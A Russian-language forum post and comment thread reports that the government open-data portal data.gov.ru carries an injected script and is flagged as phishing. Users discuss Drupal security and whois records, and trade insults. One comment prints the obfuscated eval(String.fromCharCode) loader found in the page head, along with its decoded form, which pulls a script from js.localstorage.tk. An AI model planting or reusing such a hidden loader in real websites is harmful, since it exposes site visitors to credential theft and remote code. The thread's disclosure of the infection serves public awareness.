Пофигизм - наш ответ хакерам: Взломано ядро портала открытых данных России

Аватар пользователя mentat

Пока янки негодуют и трясутся над своими информационными ресурсами, наши власти просто положили болт на безопасность. Отличный ассимитричный ответ на взломы наших систем.

Несколько дней назад в комментариях я дал комрадам ссылку на наши "открытые данные" http://data.gov.ru/  (а конкретно на http://data.gov.ru/taxonomy/term/71/datasets )
Каково же было мое удивление, когда браузер Хром выдал, что это фишинговая страница. Я проверил - действительно в заголовке страницы скрыто подключается скрипт со стороннего сайта https://js.localstorage.tk
Впринципе в этом нет ничего удивительного - сайт сделан на Drupal, который известен своей бесплатной дырявостью.
Стало интересно - когда же закроют эту уязвимость. Гугл обычно присылает предупреждения веб-мастерам, если на их страницах завелась нечисть. Прошло уже несколько дней, но ничего не поменялось. Сайт все также заражен, и вообщем то всем пофиг. Еще раз - сайт data.gov.ru - официальный правительственный домен.

Внимание - не осуществляйте авторизацию на этом сайте - ваши учетные данные могут утечь к злоумышленникам.

Ну и напоследок ложка меда - сайт js.localstorage.tk не пингуется. Но при этом не разделегирован 

p# whois localstorage.tk

   Domain name:
      LOCALSTORAGE.TK

   Organisation:
      Freedom Registry, Inc.
      2225 East Bayshore Road #290
      Palo Alto CA 94303
      United States
      Phone: +1 650-681-4172
      Fax: +1 650-681-4173

   Domain Nameservers:
      NS01.FREENOM.COM
      NS02.FREENOM.COM
      NS03.FREENOM.COM
      NS04.FREENOM.COM

И почему наши политики не кричат что американцы highly likely взломали наш правительственный сервер? За друпал было бы конечно стыдно, но какой повод ...
Ну и делаем ставки, когда наши таки полечат сайт.

Авторство: 
Авторская работа / переводика

Комментарии

Аватар пользователя alexsword
alexsword(12 лет 7 месяцев)

> сайт сделан на Drupal, который известен своей бесплатной дырявостью.

У нас тоже в основе движка Друпал, но вроде не ломали ни разу.

Куча серьезных сайтов на этой архитектуре сделано.

Возможно тут дело не в системе, а в человеческом факторе.  Админ накосячил, или намеренно (при увольнении, например) нагадил. 

Аватар пользователя salemem
salemem(11 лет 1 месяц)

Хабровский скриптокиди безопасность проверяет хромом, о чем вообще тут говорить? Почему это на главной. Он к примеру даже не знает о том, что у буша и обамы сайты тоже на друпал были, и что-то никто не смог поломать. Даже думаю имя этого "админа" не обиженного, а опущенного вернее говорить, известно: mentat

Комментарий администрации:  
*** Ахтунг! Живая оранжевая крыса ***
Аватар пользователя alexsword
alexsword(12 лет 7 месяцев)

Высеры про Друпал, конечно, невежество, но сама новость забавна - ведь это точка входа на портал открытых данных.

Аватар пользователя salemem
salemem(11 лет 1 месяц)

Прикол в реальности в том, что это всего-лишь подозрение гугля на фишинг. Но счастья у школьнка - полные штаны.

Комментарий администрации:  
*** Ахтунг! Живая оранжевая крыса ***
Аватар пользователя alexsword
alexsword(12 лет 7 месяцев)

Выглядит и впрямь предельно подозрительно - российскому ресурсу зачем на мутный штатовский сайт из черных списков данные засылать?

Аватар пользователя rukav
rukav(8 лет 1 день)

gov.ru домен принадлежит ФСО России. Соответственно это в их компетенции контролировать безопасность всех своих поддоменных (data.gov.ru) ресурсов.

Автору бы написать им письмо и обратить на это внимание.

 

 

Аватар пользователя mentat
mentat(12 лет 5 месяцев)

У нас конечно не Будапешт, но от общения с этими ребятами я воздержусь

Аватар пользователя Bruno
Bruno(8 лет 10 месяцев)

Вот жеж блин! Как всё-таки различается культура по отношению к безопасности в мире! На Западе денежные призы дают за взлом алгоритмов шифрования, понимая, что любая система рано или поздно может стать уязвимой и гораздо лучше узнать об этом как можно раньше, пока этим не надумали воспользоваться какие-нибудь злоумышленники. Хотя они и не сразу к этому пришли, но всё-таки пришли. А на Востоке (Будапешт - всё-таки Восточная Цэуропа) пока ещё придерживаются средневековых методов устрашения.

Аватар пользователя kw
kw(9 лет 11 месяцев)

Как всё-таки различается культура по отношению к безопасности в мире! На Западе денежные призы дают за взлом алгоритмов шифрования, понимая, что любая система рано или поздно может стать уязвимой и гораздо лучше узнать об этом как можно раньше

Это вы про грязных русских хакеров?

Аватар пользователя Bruno
Bruno(8 лет 10 месяцев)

Нет. Про RSA Factoring Chalenge. Правда, именно эти соревнования уже 10 лет не проводятся - по той причине, что рост производительности компьютеров затормозился и взлом методом грубой силы сейчас не актуален. Но уверен, что с появлением каких-нибудь квантовых компьютеров движуха там снова возобновится. Но есть и другие менее известные конкурсы, исключающие методы грубой силы.

Тем не менее, этого достаточно для иллюстрации различий самих подходов к безопасности. А у нас бы Яровая их всех из пулемёта расстреляла.

Аватар пользователя calvares
calvares(9 лет 6 месяцев)

Есть разница. Там парень продемонстрировал своими действиями, потому ему инкриминировали.

Тут стандартные предупреждения браузера без изменения даже кода страницы.

Аватар пользователя parrit
parrit(11 лет 2 месяца)

Технической поддержкой занимается вот эта мутная контора.

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        OPENDATASUPPORT.RU
nserver:       dns1.yandex.net.
nserver:       dns2.yandex.net.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     RU-CENTER-RU
admin-contact: https://www.nic.ru/whois
created:       2017-10-10T10:18:37Z
paid-till:     2018-10-10T10:18:37Z
free-date:     2018-11-10
source:        TCI

Last updated on 2018-05-24T10:51:33Z

 

Аватар пользователя rukav
rukav(8 лет 1 день)

Контора? Скорей всего шарашкина контора laugh

Публично за opendatasupport.ru скрывается некая "Служба поддержки Портала открытых данных РФ":

телефон: 8-495-220-65-68 (с 10:00 до 19:00 МСК)

e-mail: support@opendatasupport.ru

Но вот сам opendatasupport.ru домен зарегистрирован на некое частное лицо.

Еще раз, частное лицо! И видимо, служба поддержки осуществляется этим самым мутным прикормленным лицом из министерства экономики laugh

Аватар пользователя parrit
parrit(11 лет 2 месяца)

Таки да. Согласен.

 

Аватар пользователя mentat
mentat(12 лет 5 месяцев)

Дауненок, ты считаешь новость про то что правительственный сайт взломали и это никто не фиксит - ерундой? :) Иди прогуляйся
Для дауненка еще раз - я не проводил аудит безопасности сайта, я это заметил просто попытавшись зайти на сайт.

Аватар пользователя mentat
mentat(12 лет 5 месяцев)

Если обновлять почаще, то рисков меньше

Аватар пользователя И-23
И-23(8 лет 8 месяцев)

Какая прелесть.
Тихой сапой продвигается мысль о проприетарной не-дырявости.
Автору статьи не помешало бы изучить соответствующие профили IIS'а.

Аватар пользователя e.tvorogov
e.tvorogov(8 лет 4 месяца)

Шапкозакидателям не стыдно от таких новостей.

Аватар пользователя DeimonAx
DeimonAx(8 лет 1 неделя)

сайт js.localstorage.tk не пингуется.

Если у него пинги отключены, зачем ему пинговаться? А вот, что он не резолвится - это хорошо.

Аватар пользователя rukav
rukav(8 лет 1 день)

Кстати, вот он офис этой Freedom Registry, Inc. канторы по ул. 2225 East Bayshore Road

Рядом растут берёзки laugh

Аватар пользователя Weard
Weard(6 лет 7 месяцев)

Рядом растут берёзки

Ну, вот оно чё..

Комментарий администрации:  
*** Отключен (лидер бан-рейтинга, провокатор) ***
Аватар пользователя shumod
shumod(8 лет 9 месяцев)

> Впринципе в этом нет ничего удивительного - сайт сделан на Drupal, который известен своей бесплатной дырявостью.

Недавно в ядре была обнаружена уязвимость. Сайт просто не обновили, чтобы закрыть её. По каким причинам - большой вопрос.

Такие уязвимости в друпале обнариживаются значительно реже, чем в джумле или вордпрессе.

 

> Внимание - не осуществляйте авторизацию на этом сайте - ваши учетные данные могут утечь к злоумышленникам.

В целом эта уязвимость даёт злоумышленнику полный доступ к управлению сайтом. Поэтому все данные уже утекли, если они были в базе данных.

Аватар пользователя rukav
rukav(8 лет 1 день)

Что касается "localstorage.tk", то его многие ругают как подхваченную заразу. См. форум. А также похожие симптомы.

Аватар пользователя Rashad_rus
Rashad_rus(12 лет 4 месяца)

Откройте исходники страниц сайта - ни чего подобного там нет. Уж очень маловероятно, что гугль САМ занимается фишингом, чтобы воровать Ваши данные или, скорее - кто-то ходит через проксю, которая искажает запрашиваемый контент или словил виря.)))))))

Аватар пользователя mentat
mentat(12 лет 5 месяцев)

Там оно в скрытом виде:

<head><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 46, 108, 111, 99, 97, 108, 115, 116, 111, 114, 97, 103, 101, 46, 116, 107, 47, 115, 46, 106, 115, 63, 109, 111, 114, 61, 50, 51, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));</script>

Это развертывается в
"var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?mor=23"; document.head.appendChild(z);
<
Аватар пользователя nictrace
nictrace(12 лет 4 месяца)

обфусцированный js, ага

Аватар пользователя Rashad_rus
Rashad_rus(12 лет 4 месяца)

Да... верно подметили. Это уже повод для разбора. Серьезного разбора полетов. Если в течении недели не уберут - кого-то снимут с должности... обещаю!

Аватар пользователя nictrace
nictrace(12 лет 4 месяца)

сайт открывается, обращение к турчанскому скрипту действительно есть, но он не загружается, поскольку домен не имеет ssl-сертификата. Если владалец турчанского домена завтра поставит нормальный сертификат - одному Аллаху ведомо, что будет грузиться вместе с порталом wink

Аватар пользователя Podvalny
Podvalny(10 лет 2 месяца)

только .TK - это не Турция, а Токелау smiley

Аватар пользователя nictrace
nictrace(12 лет 4 месяца)

ну тем более) "островные" зоны чаще всего используются мошенниками...

Аватар пользователя rukav
rukav(8 лет 1 день)

сайт открывается, обращение к турчанскому скрипту действительно есть, но он не загружается, поскольку домен не имеет ssl-сертификата

Немного не в этом суть. Домен занят "localstorage.tk", только вот за ним сервера нет. Возможно сервер активизируют в определенное время и только после этого запросы начнут исполнятся.

Аватар пользователя nictrace
nictrace(12 лет 4 месяца)

точняк, DNS не прописали...

Аватар пользователя shaastra
shaastra(12 лет 4 месяца)

Этот проект (data.gov.ru) видимо заброшен где-то с конца 17-го года (судя по ассоциированным с проектом форумом, соцсетями).
Сайт даже и не взломан, а просто заражен ботом, который обходил все drupal-сайты с незакрытой уязвимостью и заражал их.
Интересно, почему забросили проект

Аватар пользователя promedol
promedol(8 лет 4 месяца)

сайт сделан на Drupal, который известен своей бесплатной дырявостью.

Drupal не более и не менее дырявый, чем любая другая cms. Бесплатность тут вообще-то не при чём. Да и ломают в 90% случаев не сам друпал, разработчики ядра там внимательно относятся к безопасности. Проблема - разнообразные модули, написанные жопой.

Комментарий администрации:  
*** Готовит кляузу в прокуратуру на наших авторов и АШ в целом - https://aftershock.news/?q=comment/11170411#comment-11170411 ***
Аватар пользователя Despinator
Despinator(7 лет 3 месяца)

Вот поэтому всё, что нужно, забираю оттуда не браузером, а самописным скриптом с перепроверками.

Скрытый комментарий Повелитель Ботов (без обсуждения)
Аватар пользователя Повелитель Ботов

Перспективный чат детектед! Сим повелеваю - внести запись в реестр самых обсуждаемых за последние 4 часа.

Комментарий администрации:  
*** Это легальный, годный бот ***
Аватар пользователя mkizub
mkizub(8 лет 11 месяцев)

Взломано ядро портала открытых данных России

А в чём проблема? Это же портал открытых данных!!!

Комментарий администрации:  
*** Отключен (клевета) ***
Аватар пользователя TPAKTOP
TPAKTOP(12 лет 5 месяцев)

в том, что могут быть скомпрометированы данные всех пользователей этого портала. подсунуть можно что угодно, от майнера до фишинга.

Комментарий администрации:  
*** Уличен в сомнительных утверждениях и манипуляциях, считает что вправе говорить от лица "народных масс" ***
Аватар пользователя mkizub
mkizub(8 лет 11 месяцев)

Их и так можно скомпроментировать. Разместить в фейсбуке объявление, что такой-то - редиска. И все западные СМИ подхватят эту чудовищную ложь, оправдывая бомбардировку молодой Аравийской Народной Республики.

Комментарий администрации:  
*** Отключен (клевета) ***
Аватар пользователя TPAKTOP
TPAKTOP(12 лет 5 месяцев)

Я говорил о технической компрометации, т.е. получении доступа к пользовательским данным и ресурсам. А вы про что-то совсем другое.

Комментарий администрации:  
*** Уличен в сомнительных утверждениях и манипуляциях, считает что вправе говорить от лица "народных масс" ***
Аватар пользователя mkizub
mkizub(8 лет 11 месяцев)

Я про то, что изначально и тема смешная, и пост мой был шуткой.

Комментарий администрации:  
*** Отключен (клевета) ***